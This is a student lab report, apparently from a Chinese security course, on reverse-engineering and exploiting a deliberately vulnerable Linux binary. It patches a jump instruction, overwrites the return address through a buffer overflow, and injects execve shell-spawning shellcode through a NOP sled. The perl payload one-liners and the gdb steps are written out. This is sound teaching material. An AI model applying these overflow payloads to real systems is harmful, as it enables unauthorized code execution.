zoukankan      html  css  js  c++  java
  • 20155309南皓芯 网络对抗《网络攻防》 Exp1 PC平台逆向破解(5)M

    实践目标

    本次实践的对象是linux的可执行文件
    该程序正常执行流程是:main调用foo函数,foo函数会简单回显任何用户输入的字符串。

    该程序同时包含另一个代码片段,getShell,会返回一个可用Shell。正常情况下这个代码是不会被运行的。我们实践的目标就是想办法运行这个代码片段。我们将学习两种方法运行这个代码片段,然后学习如何注入运行任何Shellcode。

    实践内容

    手工修改可执行文件,改变程序执行流程,直接跳转到getShell函数。
    利用foo函数的Bof漏洞,构造一个攻击输入字符串,覆盖返回地址,触发getShell函数。

    注入一个自己制作的shellcode并运行这段shellcode。
    1.掌握NOP, JNE, JE, JMP, CMP汇编指令的机器码

    2.掌握反汇编与十六进制编程器

    3.能正确修改机器指令改变程序执行流程

    4.能正确构造payload进行bof攻击

    实践要求

    1.所有操作截图主机名为本人姓名拼音

    2.所编辑的文件名包含自己的学号

    实践思路

    通过运行原本不可访问的代码片段,强行修改程序执行流以及注入运行任意代码的操作。

    关于命令的知识储备

    CMP:比较指令,功能相当于减法指令,只是对操作数之间运算比较,不保存结果。cmp指令执行后,将对标志寄存器产生影响。其他相关指令通过识别这些被影响的标志寄存器位来得知比较结果。

    JNE:条件转移指令,如果不相等则跳转。(机器码:75)

    JE:条件转移指令,如果相等则跳转。(机器码:74)

    JMP:无条件转移指令。段内直接短转Jmp short(机器码:EB)段内直接近转移Jmp near(机器码:E9)段内间接转移Jmp
    word(机器码:FF)段间直接(远)转移Jmp far(机器码:EA)

    NOP:空指令,执行到NOP时,CPU什么也不做,仅仅当做一个指令执行过去并继续执行NOP后面的一条指令。(机器码:90)

    实践一:直接修改程序机器指令,改变程序执行流程

    第一步:通过

         objdump -d pwn1_20155309
    

    对文件进行反汇编

    其次有几个特别需要注意的数据

    接下来上网上找那种十六进制的计算器即可,由于课上老师已经为大家演示过了,所以我们能知道:将d7改为c3
    对应的就算过程相减即可。

    第三步:通过命令vi pwn1_20155321编辑文件,通过命令:%! xxd把文件转为十六进制编辑模式,通过命令/d7ff找到需要修改的地方,最后输入i进入编辑模式,即把d7为c3

    第四步:改完后输入命令:%! xxd -r将文件转回至二进制形式,再输入:wq保存并退出

    第五步:由此可发现程序已从原来跳转至foo函数变为跳转至getshell函数

    这样也就完成了实践

    实践二:通过构造输入参数,造成BOF攻击,改变程序执行流

    了解关于gdb的命令:

    反汇编,了解程序的基本功能
    触发getshell函数
    该可执行文件正常运行是调用如下函数foo,这个函数有Buffer overflow漏洞
    这里读入字符串,但系统只预留了__字节的缓冲区,超出部分会造成溢出,我们的目标是覆盖返回地址
    上面的call调用foo,同时在堆栈上压上返回地址值:80484ba

    确认输入字符串哪几个字符会覆盖到返回地址
    通过命令进行调试,通过命令r进行运行,通过命令info r可查看各寄存器的值,其中主要关注EIP寄存器的值(EIP寄存器读取即将要执行的指令)

    我们的目标是触发函数getShell

    该可执行文件正常运行是调用函数foo,这个函数有Buffer overflow漏洞
    函数foo中的mov(804849a)读入字符串,但系统只预留了32字节的缓冲区,超出部分会造成溢出,我们的目标是覆盖返回地址

    函数main中的call调用函数foo,同时在堆栈上压上返回地址值:80484

    注意到eip的值为ASCII的5,即在输入字符串的“5”的部分发生溢出。

    由此可以看到,如果输入字符串1111111122222222333333334444444412345678,那 1234 那四个数最终会覆盖到堆栈上的返回地址,进而CPU会尝试运行这个位置的代码。那只要把这四个字符替换为 getShell 的内存地址,输给pwn1,pwn1就会运行getShell。

    由可知此1234这四个数最终会覆盖到堆栈上的返回地址,进而CPU会尝试运行这个位置的代码。因此只要把这四个字符替换为getShell的内存地址,输给pwn1,pwn1就会运行getShell
    由反汇编结果可知getShell的内存地址为:0804847d

    要确认用什么值来覆盖返回地址
    我们通过反汇编的时候,可以了解到shellcode的内存地址是 0804847d

    然后需要判断输入方式是大端还是小断,也就是说到底是输入

    11111111222222223333333344444444x08x04x84x7d
    

    还是输入

    11111111222222223333333344444444x7dx84x04x08
    

    根据判断我们可以得知是小端输入。也就是

    11111111222222223333333344444444x7dx84x04x08
    

    构造输入字符串

    因为无法通过键盘输入x7dx84x04x08这样的16进制值,所以先生成包括这样字符串的一个文件。x0a表示回车,如果没有的话,在程序运行时就需要手工按一下回车键。

    实践三:注入Shellcode并执行

    首先准备一段shellcode

    shellcode就是一段机器指令(code)
    通常这段机器指令的目的是为获取一个交互式的shell(像linux的shell或类似windows下的cmd.exe),
    所以这段机器指令被称为shellcode。
    在实际的应用中,凡是用来注入的机器指令段都通称为shellcode,像添加一个用户、运行一条指令。

    其次按照老师所给的教程输入命令即可。如下图所示:

    构造要注入的payload

    Linux下有两种基本构造攻击buf的方法:

    retaddr+nop+shellcode
    
    nop+shellcode+retaddr
    

    因为retaddr在缓冲区的位置是固定的,shellcode要不在它前面,要不在它后面。
    简单说缓冲区小就把shellcode放后边,缓冲区大就把shellcode放前边

    我们这个buf够放这个shellcode了
    结构为

    nops+shellcode+retaddr。 
    

    nop一为是了填充,二是作为“着陆区/滑行区”。
    我们猜的返回地址只要落在任何一个nop上,自然会滑到我们的shellcode。

    使用命令

    perl -e 'print "A" x 32;print "x04x03x02x01x90x90x90x90x90x90x31xc0x50x68x2fx2fx73x68x68x2fx62x69x6ex89xe3x50x53x89xe1x31xd2xb0x0bxcdx80x90x00xd3xffxffx00"' > input_shellcode
    

    接下来我们打开另一个终端。
    输入攻击

    buf (cat input_shellcode;cat) | ./pwn1
    

    再开另外一个终端,用gdb来调试pwn1这个进程:

    ps -ef | grep pwn1
    

    命令找到pwn1的进程号是:7806

    用gdb、attach 7806命令启动gdb调试这个进程:

    用disassemble foo命令反汇编,通过设置断点,来查看注入buf的内存地址:

    break *0x080484ae
    

    命令设置断点,输入c命令(continue)继续运行,同时在pwn1进程正在运行的终端敲回车,使其继续执行。再返回调试终端,使用info r esp命令查找地址:

        x/16x 0xffffd27c
    

    命令查看其存放内容,看到了0x01020304,就是返回地址的位置。根据我们构造的input_shellcode可知,shellcode就在其后,所以地址应为0xffffd27c:

    接下来只需要将之前的x4x3x2x1改为这个地址即可,用命

    perl -e 'print "A" x 32;print "x80xd2xffxffx90x90x90x90x90x90x31xc0x50x68x2fx2fx73x68x68x2fx62x69x6ex89xe3x50x53x89xe1x31xd2xb0x0bxcdx80x90x00xd3xffxffx00"' > input_shellcode
    

    再用

    (cat input_shellcode;cat) | ./pwn1
    

    命令再次执行程序,攻击成功!

    实验中遇到的问题

    1.在实验二的时候,没有重新拷pwn导致了任务的失败
    2.在实验三的适合,没有另外打开一个终端
    导致任务的失败。

    感想与收获

    缓冲区溢出的实验是我对程序溢出利用有了深刻的认识理解,通过调试软件漏洞大大增长了自己的动手实践能力。同时还找到了自己不足的方面。希望在以后的学习中更加丰富自己。

  • 相关阅读:
    利用opengl画一个水波的曲面
    Eclipse 使用OpenGL
    Javascript学习过程(二)
    Workflow Learing
    YAWL设计实例
    YAWL使用方法
    ImageJ二次开发学习纪录之初步体会
    [LeetCode 660] Remove 9
    [LeetCode 1542] Find Longest Awesome Substring
    [LeetCode 879] Profitable Schemes
  • 原文地址:https://www.cnblogs.com/nhx19970709/p/8595728.html
Copyright © 2011-2022 走看看